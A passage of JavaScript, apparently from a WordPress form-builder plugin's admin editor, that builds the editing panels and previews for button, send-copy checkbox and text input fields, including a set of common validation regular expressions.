			el_title.setAttribute("onKeyUp", "change_label('"+i+"_elementform_id_temp"+j+"', this.value);");
	
		var el_func_label = document.createElement('label');
			el_func_label.setAttribute("class", "fm-field-label");
			el_func_label.setAttribute("for", "el_func"+j);
			el_func_label.innerHTML = "OnClick function";
		
		var el_func = document.createElement('input');
			el_func.setAttribute("id", "el_func"+j);
			el_func.setAttribute("type", "text");
			el_func.setAttribute("value", w_func[j]);
			el_func.style.cssText =   "width:140px;  margin-left:11px;";
			el_func.setAttribute("onKeyUp", "change_func('"+i+"_elementform_id_temp"+j+"', this.value);");
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_button"+j+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_button("+j+","+i+")");
			
		td_hr.appendChild(hr);
		td_button.appendChild(el_title_label);
		td_button.appendChild(el_title);
		td_button.appendChild(br1);
		td_button.appendChild(el_func_label);
		td_button.appendChild(el_func);
		td_X.appendChild(el_choices_remove);
		edit_main_td4.appendChild(table_button);
	
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);

	edit_main_table.appendChild(edit_main_tr1);

	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr2);
//	edit_main_table.appendChild(edit_main_tr5);
//	edit_main_table.appendChild(edit_main_tr6);

	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='button';	type='button'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_button");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
    var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = "button_"+i;
			label.style.cssText = 'display:none';
	    
	n=w_title.length;
	for(j=0; j<n; j++)
	{      	
	
		var adding = document.createElement(element);
				adding.setAttribute("type", type);
				adding.setAttribute("id", i+"_elementform_id_temp"+j);
				adding.setAttribute("name", i+"_elementform_id_temp"+j);
				adding.setAttribute("value", w_title[j]);
				adding.innerHTML = w_title[j];
				adding.setAttribute("onclick", w_func[j]);
				
				
		div_element.appendChild(adding);
	}			
      	var main_td  = document.getElementById('show_table');
	
      	div_label.appendChild(label);
      
        div_element.appendChild(adding_type);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      
      

      	div.appendChild(div_field);
      	div.appendChild(br1);
      	main_td.appendChild(div);
change_class(w_class, i);
refresh_attr(i, 'type_checkbox');
}

function type_send_copy(i, w_field_label, w_field_label_size, w_field_label_pos, w_first_val, w_required, w_attr_name, w_attr_value) {

    document.getElementById("element_type").value="type_send_copy";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");

	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');

	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
		
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
		
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
		  
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');

	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
	    el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
        el_label_textarea.setAttribute("id", "edit_for_label");
        el_label_textarea.setAttribute("rows", "4");
        el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	    el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";

	var el_required = document.createElement('input');
        el_required.setAttribute("id", "el_required");
        el_required.setAttribute("type", "checkbox");
        el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
        el_required.setAttribute("checked", "checked");
			
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_send_copy')");
		
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	    el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_send_copy')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_send_copy')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_send_copy')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	

	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br2);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='input';	type='checkbox'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_send_copy");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding = document.createElement(element);
        adding.setAttribute("type", type);
		if(w_first_val)
			adding.setAttribute("checked", "checked");
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("name", i+"_elementform_id_temp");
		adding.setAttribute("onclick", "set_checked('"+i+"','','form_id_temp')");

	 
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
		var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("class", "fm-editable-label");
			
      	edit_labels = document.createTextNode("Use the field to allow the user to choose whether to receive a copy of the submitted form or not. Do not forget to fill in User Email section in Email Options in advance.");

		div_for_editable_labels.appendChild(edit_labels);  


			
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width= w_field_label_size+'px';
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";

	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
      	div_element.appendChild(adding_type);
      	div_element.appendChild(adding_required);
      	div_element.appendChild(adding);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      
      	div.appendChild(div_field);
      	div.appendChild(br3);
      	div.appendChild(div_for_editable_labels);
		
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
	refresh_attr(i, 'type_text');
}

function type_text(i, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_regExp_status, w_regExp_value, w_regExp_common, w_regExp_arg, w_regExp_alert, w_unique, w_attr_name, w_attr_value) {

    document.getElementById("element_type").value="type_text";
	delete_last_child();	
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");

	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");

	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
	var edit_main_tr11 = document.createElement('tr');
	var edit_main_tr12 = document.createElement('tr');
		edit_main_tr12.setAttribute("id", "edit_main_tr12");
	var edit_main_tr13 = document.createElement('tr');
		edit_main_tr13.setAttribute("id", "edit_main_tr13");
	var edit_main_tr14 = document.createElement('tr');
		edit_main_tr14.setAttribute("id", "edit_main_tr14");
	var edit_main_tr15 = document.createElement('tr');
		edit_main_tr15.setAttribute("id", "edit_main_tr15");
	if(w_regExp_status == 'no' || w_regExp_status == "")
	{
		edit_main_tr12.style.cssText = 'display:none;';
		edit_main_tr13.style.cssText = 'display:none;';
		edit_main_tr14.style.cssText = 'display:none;';
		edit_main_tr15.style.cssText = 'display:none;';
	}	
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');

	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
		
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
		
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
		  
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');

	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	var edit_main_td11 = document.createElement('td');
	var edit_main_td11_1 = document.createElement('td');
	var edit_main_td12 = document.createElement('td');	  
	var	edit_main_td12_1 = document.createElement('td');	  
	var edit_main_td13 = document.createElement('td');
	var edit_main_td13_1 = document.createElement('td');
	var edit_main_td14 = document.createElement('td');
	var edit_main_td14_1 = document.createElement('td');
	var edit_main_td15 = document.createElement('td');
	var edit_main_td15_1 = document.createElement('td');
	
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
	    el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
        el_label_textarea.setAttribute("id", "edit_for_label");
        el_label_textarea.setAttribute("rows", "4");
        
        el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
        el_label_left.innerHTML = "Left";	
		
	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");
	
	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
        el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos == "top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	    el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";

	var el_size = document.createElement('input');
		el_size.setAttribute("id", "edit_for_input_size");
		el_size.setAttribute("type", "text");
		el_size.setAttribute("value", w_size);
		el_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_first_value_label = document.createElement('label');
		el_first_value_label.setAttribute("class", "fm-field-label");
	    el_first_value_label.setAttribute("for", "el_first_value_input");
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_input = document.createElement('input');
        el_first_value_input.setAttribute("id", "el_first_value_input");
        el_first_value_input.setAttribute("type", "text");
        el_first_value_input.setAttribute("value", w_title);
        el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
	
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	    el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";

	var el_required = document.createElement('input');
        el_required.setAttribute("id", "el_required");
        el_required.setAttribute("type", "checkbox");
        el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
        el_required.setAttribute("checked", "checked");
			
	/********************** REGULAR EXPRESSION ************************/
	var el_add_regExp_label = document.createElement('label');
		el_add_regExp_label.setAttribute("class", "fm-field-label");
		el_add_regExp_label.setAttribute("for", "el_regExp_"+i);
		el_add_regExp_label.innerHTML = "Validation (Regular Exp.)";

	var el_add_regExp = document.createElement('input');
        el_add_regExp.setAttribute("id", "el_regExp_"+i);
        el_add_regExp.setAttribute("type", "checkbox");
        el_add_regExp.setAttribute("onclick", "set_regExpStatus('"+i+"_regExpStatus')");
	if(w_regExp_status == "yes")
        el_add_regExp.setAttribute("checked", "checked");

	var el_reg_value_label = document.createElement('label');
		el_reg_value_label.setAttribute("class", "regExp_cell fm-field-label");
		el_reg_value_label.innerHTML = "Regular Expression";
	
	var el_reg_value = document.createElement('textarea');
		el_reg_value.setAttribute("id", "regExp_value"+i);
		el_reg_value.setAttribute("class","regExp_cell");
		el_reg_value.setAttribute("onKeyUp", "change_regExpValue('"+i+"', this.value ,'"+i+"_regExp_valueform_id_temp','')");
		el_reg_value.innerHTML = w_regExp_value;
	
	var count = 0;
	var common_val_arr = [];
		common_val_arr["Select"] = "";
		common_val_arr["Name(Latin letters and some symbols)"] = "^[a-zA-Z'-'\\s]+$";
		common_val_arr["Phone Number(Digits and dashes)"] = "^(\\+)?[0-9]+(-[0-9]+)?(-[0-9]+)?(-[0-9]+)?$";
		common_val_arr["Integer Number"] = "^(-)?[0-9]+$";
		common_val_arr["Decimal Number"] = "^(-)?[0-9]+(\\.[0-9]+)?$";
		common_val_arr["Latin letters and Numbers"] = "^[a-z&A-Z0-9]*$";
		common_val_arr["Credit Card (16 Digits)"] = "^([0-9](\\.)?){15}[0-9]$";
		common_val_arr["Zip Code"] = "^(\\d{5}-\\d{4}|\\d{5}|\\d{9})$|^([a-zA-Z]\\d[a-zA-Z] \\d[a-zA-Z]\\d)$";
		common_val_arr["IP Address"] = "^((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[0-9]{1,2})\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[0-9]{1,2})$";
		common_val_arr["Date m/d/y (e.g. 12/21/2013)"] = "^([0-9]|1[0,1,2])/([0-9]|[0,1,2][0-9]|3[0,1])/[0-9]{4}$";
		common_val_arr["Date d.m.y (e.g. 21.12.2013)"] = "^([0-9]|[0,1,2][0-9]|3[0,1])\\.([0-9]|1[0,1,2])\\.[0-9]{4}$";
		common_val_arr["MySQL Date Format (2013-12-21)"] = "^\\d{4}-(0[0-9]|1[0,1,2])-([0,1,2][0-9]|3[0,1])$";
				
	var el_reg_com_val_label = document.createElement('label');
		el_reg_com_val_label.setAttribute("class", "regExp_cell fm-field-label");
		el_reg_com_val_label.innerHTML = "Common Regular Expressions ";
				
	var el_reg_com_val = document.createElement('select');
		el_reg_com_val.setAttribute("id", "common_RegExp"+i);
		el_reg_com_val.setAttribute("name", "common_RegExp"+i);
		el_reg_com_val.setAttribute("onChange", "change_regExpValue('"+i+"','"+w_regExp_value+"','"+i+"_regExp_valueform_id_temp', this.value)");
		el_reg_com_val.style.cssText ="width:200px; margin-bottom:9px;";
				
	for (var keys  in common_val_arr)
	{
		if (!common_val_arr.hasOwnProperty(keys)) 
			continue;
			
		var el_option_common = "el_com_val"+count;
			el_option_common = document.createElement('option');
			el_option_common.setAttribute("id", "edit_for_label_common"+count);
			el_option_common.setAttribute("value",common_val_arr[keys]);
			if(w_regExp_common == count)
				el_option_common.setAttribute("selected", "selected");
			el_option_common.innerHTML = keys;
			
		el_reg_com_val.appendChild(el_option_common);
		count++;
	}

	var el_reg_arg_label = document.createElement('label');
		el_reg_arg_label.setAttribute("class", "regExp_cell fm-field-label");
		el_reg_arg_label.innerHTML = "Case Insensitive";
			
	var el_reg_arg = document.createElement('input');
		el_reg_arg.setAttribute("id", "el_regArg_"+i+" ");
		el_reg_arg.setAttribute("type", "checkbox");
		el_reg_arg.setAttribute("onclick", "set_regExpArgument('"+i+"_regArgument')");
	if(w_regExp_arg == 'i')
		el_reg_arg.setAttribute("checked", "checked");
					
	var el_reg_alert_label = document.createElement('label');
		el_reg_alert_label.setAttribute("class", "regExp_cell fm-field-label");
		el_reg_alert_label.innerHTML = "Alert Message";
			
	var el_reg_alert = document.createElement('textarea');
		el_reg_alert.setAttribute("type", "text");
		el_reg_alert.setAttribute("id", "regExp_alert"+i);
		el_reg_alert.setAttribute("class","regExp_cell");
		el_reg_alert.setAttribute("onKeyUp", "change_regExpAlert(this.value,'"+i+"_regExp_alertform_id_temp')");
		el_reg_alert.innerHTML = w_regExp_alert;
	
	/**************************************************************************/	

	var el_unique_label = document.createElement('label');
		el_unique_label.setAttribute("class", "fm-field-label");
	    el_unique_label.setAttribute("for", "el_unique");
		el_unique_label.innerHTML = "Allow only unique values";

	var el_unique = document.createElement('input');
        el_unique.setAttribute("id", "el_unique");
        el_unique.setAttribute("type", "checkbox");
        el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.innerHTML = "Deactive Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", "input_deactive");
		el_style_textarea.setAttribute("disabled", "disabled");
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_style_label2 = document.createElement('label');
	    el_style_label2.setAttribute("class", "fm-field-label");
		el_style_label2.innerHTML = "Active Class name";
	
	var el_style_textarea2 = document.createElement('input');
		el_style_textarea2.setAttribute("type", "text");
		el_style_textarea2.setAttribute("value", "input_active");
		el_style_textarea2.setAttribute("disabled", "disabled");
        el_style_textarea2.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
		
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	    el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
